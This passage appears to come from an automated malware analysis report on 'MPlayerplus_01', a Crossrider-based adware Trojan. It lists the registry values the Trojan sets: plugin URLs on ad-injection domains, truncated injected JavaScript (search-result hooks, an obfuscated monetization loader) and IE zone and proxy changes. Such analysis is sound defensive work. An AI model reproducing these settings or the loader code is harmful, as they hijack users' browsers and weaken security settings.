"Version" = "2"

[HKCU\Software\MPlayerplus_01\Manifest]
"Description" = "MediaPlayerEnhance Extension"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\MPlayerplus_01\Manifest]
"DisableIe" = "true"

[HKCU\Software\MPlayerplus_01\Plugins\275]
"Name" = "pricedetect_sidebar_small_m"

[HKCU\Software\MPlayerplus_01\Plugins\273]
"Name" = "aedgency_back_button_m"

[HKCU\Software\MPlayerplus_01\Plugins\42]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/42.js"

[HKCU\Software\MPlayerplus_01\Plugins\91]
"JavaScript" = "(function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap==string&&typeof ap.trim==function){return ap.trim();}return ap==null?:ap.toString().replace(/^\s /,).replace(/\s $/,);};function f(ap){var aq=x[ap]={},ar,at;ap=ap.split(/\s /);for(ar=0,at=ap.length;ar

[HKCU\Software\MPlayerplus_01\Plugins\263]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k

[HKCU\Software\MPlayerplus_01\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

[HKCU\Software\MPlayerplus_01\Plugins\195]
"Version" = "28"

[HKCU\Software\MPlayerplus_01\Plugins\253]
"Name" = "pixel_inject"

[HKCU\Software\MPlayerplus_01\Plugins\36]
"Version" = "8"

[HKCU\Software\MPlayerplus_01\Plugins\253]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/253.js"

[HKCU\Software\MPlayerplus_01\Plugins\45]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\43]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/43.js"

[HKCU\Software\MPlayerplus_01\Plugins\211]
"Name" = "revizer_ws_dynamic_b2b_light_m"

[HKCU\Software\MPlayerplus_01\Plugins\195]
"Name" = "icm_convertmedia_m"

[HKCU\Software\MPlayerplus_01\Plugins\269]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/269.js"

[HKCU\Software\MPlayerplus_01\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,269,93,102,104,180,184,192,220,195,211,221,223,226,230,233,242,244,253,260,262,263,273,275,281,286,289,91"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\MPlayerplus_01\Plugins\286]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/286.js"

[HKCU\Software\MPlayerplus_01\Plugins\289]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/289.js"

[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherName" = "Freeven"

[HKCU\Software\MPlayerplus_01\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)4-"

[HKCU\Software\MPlayerplus_01\Manifest]
"ChangePrevious" = "false"

[HKCU\Software\MPlayerplus_01\Plugins\47]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/47.js"

[HKCU\Software\MPlayerplus_01\Plugins\244]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\17]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/17.js"

[HKCU\Software\MPlayerplus_01\Plugins\37]
"Version" = "6"

[HKCU\Software\MPlayerplus_01\Plugins\37]
"Name" = "IEBrowserEvents"

[HKCU\Software\MPlayerplus_01\Plugins\102]
"Name" = "dealply_m"

[HKCU\Software\MPlayerplus_01\Plugins\13]
"Name" = "CrossriderAppUtils"

[HKCU\Software\MPlayerplus_01\Plugins\281]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seí¥ƒ)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\MPlayerplus_01\Plugins\221]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/221.js"

[HKCU\Software\MPlayerplus_01\Plugins\220]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/220.js"

[HKCU\Software\MPlayerplus_01\Code]
"NewTabJavaScript" = ""

[HKCU\Software\MPlayerplus_01\Plugins\46]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/46.js"

[HKCU\Software\MPlayerplus_01\Plugins\91]
"Name" = "monetizationLoader.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\MPlayerplus_01\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"

[HKCU\Software\MPlayerplus_01\Plugins\289]
"Name" = "covus_logos_m"

[HKCU\Software\MPlayerplus_01\Plugins\220]
"Name" = "icm_base_m"

[HKCU\Software\MPlayerplus_01\Plugins\242]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/242.js"

[HKCU\Software\MPlayerplus_01\Plugins\273]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\35]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/35.js"

[HKCU\Software\MPlayerplus_01\Manifest]
"UpdateInterval" = "360"

[HKCU\Software\MPlayerplus_01\Plugins\46]
"Name" = "IETimers"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\MPlayerplus_01\Plugins\262]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/262.js"

[HKCU\Software\MPlayerplus_01\Plugins\2]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\4]
"Name" = "jquery_1_7_1"

[HKCU\Software\MPlayerplus_01\Plugins\269]
"Version" = "1"

[HKCU\Software\MPlayerplus_01\Manifest]
"Name" = "MediaPlayerplus"

[HKCU\Software\MPlayerplus_01\Plugins\260]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Installer]
"osName" = "XP32"

[HKCU\Software\MPlayerplus_01\Plugins\13]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Plugins\286]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Manifest]
"IsButtonEnabled" = "false"

[HKCU\Software\MPlayerplus_01\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;}㤰-"

[HKCU\Software\MPlayerplus_01\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveu-"

[HKCU\Software\MPlayerplus_01\Plugins\275]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/275.js"

[HKCU\Software\MPlayerplus_01\Plugins\233]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Plugins\64]
"Version" = "3"

[HKCU\Software\MPlayerplus_01\Plugins\38]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/38.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherId" = "21636"

[HKCU\Software\MPlayerplus_01\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:''});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:''});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:''});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:''});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:});this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:});this.addEngine({name:ask,url)"

    [HKCU\Software\MPlayerplus_01\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "URL" = "http://js.newdatastatsserv.com/plugins/mins/104.js"

    [HKCU\Software\MPlayerplus_01\Plugins\211]
    "URL" = "http://js.newdatastatsserv.com/plugins/mins/211.js"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "Version" = "12"

    The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\MPlayerplus_01\Plugins\41]
    [HKCU\Software\MPlayerplus_01\Plugins\40]
    [HKCU\Software\MPlayerplus_01\Plugins\2]
    [HKCU\Software\MPlayerplus_01\Plugins\28]
    [HKCU\Software\MPlayerplus_01\Plugins\45]
    [HKCU\Software\MPlayerplus_01\Plugins\44]
    [HKCU\Software\MPlayerplus_01\Plugins\47]
    [HKCU\Software\MPlayerplus_01\Plugins\46]
    [HKCU\Software\MPlayerplus_01\Plugins\42]
    [HKCU\Software\MPlayerplus_01\Plugins\22]
    [HKCU\Software\MPlayerplus_01\Plugins\21]
    [HKCU\Software\MPlayerplus_01\Plugins\190]
    [HKCU\Software\MPlayerplus_01\Plugins\191]
    [HKCU\Software\MPlayerplus_01\Plugins\1]
    [HKCU\Software\MPlayerplus_01\Plugins\220]
    [HKCU\Software\MPlayerplus_01\Plugins\221]
    [HKCU\Software\MPlayerplus_01\Plugins\226]
    [HKCU\Software\MPlayerplus_01\Plugins]
    [HKCU\Software\MPlayerplus_01\Plugins\7]
    [HKCU\Software\MPlayerplus_01\Plugins\9]
    [HKCU\Software\MPlayerplus_01\Plugins\207]
    [HKCU\Software\MPlayerplus_01\Plugins\253]
    [HKCU\Software\MPlayerplus_01\Plugins\104]
    [HKCU\Software\MPlayerplus_01\Plugins\103]
    [HKCU\Software\MPlayerplus_01\Plugins\102]
    [HKCU\Software\MPlayerplus_01\Plugins\195]
    [HKCU\Software\MPlayerplus_01\Plugins\38]
    [HKCU\Software\MPlayerplus_01\Plugins\39]
    [HKCU\Software\MPlayerplus_01\Plugins\72]
    [HKCU\Software\MPlayerplus_01\Plugins\78]
    [HKCU\Software\MPlayerplus_01\Plugins\184]
    [HKCU\Software\MPlayerplus_01\Plugins\183]
    [HKCU\Software\MPlayerplus_01\Plugins\182]
    [HKCU\Software\MPlayerplus_01\Plugins\36]
    [HKCU\Software\MPlayerplus_01\Plugins\35]
    [HKCU\Software\MPlayerplus_01\Plugins\64]
    [HKCU\Software\MPlayerplus_01\Plugins\233]
    [HKCU\Software\MPlayerplus_01\Plugins\37]
    [HKCU\Software\MPlayerplus_01\Plugins\211]
    [HKCU\Software\MPlayerplus_01\Plugins\242]
    [HKCU\Software\MPlayerplus_01\Plugins\244]
    [HKCU\Software\MPlayerplus_01\Plugins\246]
    [HKCU\Software\MPlayerplus_01\Plugins\177]
    [HKCU\Software\MPlayerplus_01\Plugins\43]
    [HKCU\Software\MPlayerplus_01\Plugins\91]
    [HKCU\Software\MPlayerplus_01\Plugins\155]
    [HKCU\Software\MPlayerplus_01\Plugins\94]
    [HKCU\Software\MPlayerplus_01\Plugins\13]
    [HKCU\Software\MPlayerplus_01\Plugins\3]
    [HKCU\Software\MPlayerplus_01\Plugins\17]
    [HKCU\Software\MPlayerplus_01\Plugins\14]
    [HKCU\Software\MPlayerplus_01\Plugins\93]
    [HKCU\Software\MPlayerplus_01\Plugins\4]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process MPlayerplus_01-codedownloader.exe:2224 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\MPlayerplus_01\Plugins\246]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/setup.js"

    [HKCU\Software\MPlayerplus_01\Plugins\21]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Installer]
    "subid" = "0"

    [HKCU\Software\MPlayerplus_01\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\MPlayerplus_01\Plugins\17]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\MPlayerplus_01\Plugins\22]
    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el@'"

    [HKCU\Software\MPlayerplus_01\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\MPlayerplus_01\Plugins\72]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/appApiValidation.js"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\44]
    "Version" = "6"

    [HKCU\Software\MPlayerplus_01\Plugins\13]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderAppUtils.js"

    [HKCU\Software\MPlayerplus_01\Plugins\78]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderInfo.js"

    [HKCU\Software\MPlayerplus_01\Installer]
    "ErrorsDomain" = "http://errors.clientstaticserv.com"

    [HKCU\Software\MPlayerplus_01\Plugins\246]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi'"

    [HKCU\Software\MPlayerplus_01\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt'"

    [HKCU\Software\MPlayerplus_01\Plugins\46]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\4]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\207]
    "Name" = "dbWrapper"

    [HKCU\Software\MPlayerplus_01\Plugins\40]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\246]
    "JavaScript" = "setup2=function(d,a){var b=function(i){var k=function(l){if(typeof l!==string||l.length===0){return;}return l.replace(/.|\n/g,function(m){return m.charCodeAt(0).toString(16);});};var j=function(l){return l.match(/.{1,2}/g);};var g=j(k(a));var h=g.length;var f=$jquery_171.map(j(i),function(l,m){return(parseInt(l,16)^parseInt(g[m%h],16));});return String.fromCharCode.apply(String,f);};var e=function(){var i=appAPI;var g=i.utils;var h=g.Base64;var f=h.decode;return b(f.call(h,d));};var c=function(){var f=appAPI.JSON.parse(e());try{appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[f.pluginId]=function(){appAPI.internal.monetization.addRemoteJS({httpUrl:(typeof f.httpUrl===string)?(f.httpUrl.replace(/__CROSSRIDER_SUB_ID__/g,appAPI.internal.monetization.getSubId()).replace(/__CROSSRIDER_APP_NAME__/g,encodeURIComponent(appAPI.appInfo.name)).replace(/__CROSSRIDER'"

    [HKCU\Software\Crossrider]
    "Verifier" = "60aa827dc6ab7283db367fb7eb2cda1a"

    [HKCU\Software\MPlayerplus_01\Plugins\17]
    "Name" = "jQuery"

    [HKCU\Software\MPlayerplus_01\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\MPlayerplus_01\Plugins\155]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\35]
    "Name" = "IEAjax"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "BgVersion" = "1"

    [HKCU\Software\MPlayerplus_01\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO1'"

    [HKCU\Software\MPlayerplus_01\Plugins\4]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\MPlayerplus_01\Plugins\7]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/hooks.js"

    [HKCU\Software\MPlayerplus_01\Plugins\37]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBrowserEvents.js"

    [HKCU\Software\MPlayerplus_01\Plugins\72]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\182]
    "Name" = "openUrl"

    [HKCU\Software\MPlayerplus_01\Plugins\7]
    "Name" = "hooks"

    [HKCU\Software\MPlayerplus_01]
    "ActiveAppId" = "54246"

    [HKCU\Software\MPlayerplus_01\Plugins\94]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEPopup.js"

    [HKCU\Software\MPlayerplus_01\Plugins\233]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/revizer_p_dynamic_b2b_2_m.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\MPlayerplus_01\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\MPlayerplus_01\Plugins\195]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

    [HKCU\Software\MPlayerplus_01\Plugins\253]
    "Version" = "1"

    [HKCU\Software\MPlayerplus_01\Plugins\242]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/price_gong_m.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "ThanksUrl" = "NA"

    [HKCU\Software\MPlayerplus_01\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\MPlayerplus_01\Plugins\42]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\226]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Update]
    "LastCheck" = "1413862433"

    [HKCU\Software\MPlayerplus_01\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\103]
    "Name" = "intext_5_m"

    [HKCU\Software\MPlayerplus_01\Plugins\155]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ibario_pops_m.js"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "RunInFrame" = "false"

    [HKCU\Software\MPlayerplus_01\Plugins\190]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/pops_5_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,103,104,155,184,190,191,220,195,211,221,233,242,244,253,177,91,28"

    [HKCU\Software\MPlayerplus_01\Plugins\177]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/crossriderDashboard.js"

    [HKCU\Software\MPlayerplus_01\Installer]
    "zdata" = "0"

    [HKCU\Software\MPlayerplus_01\Code]
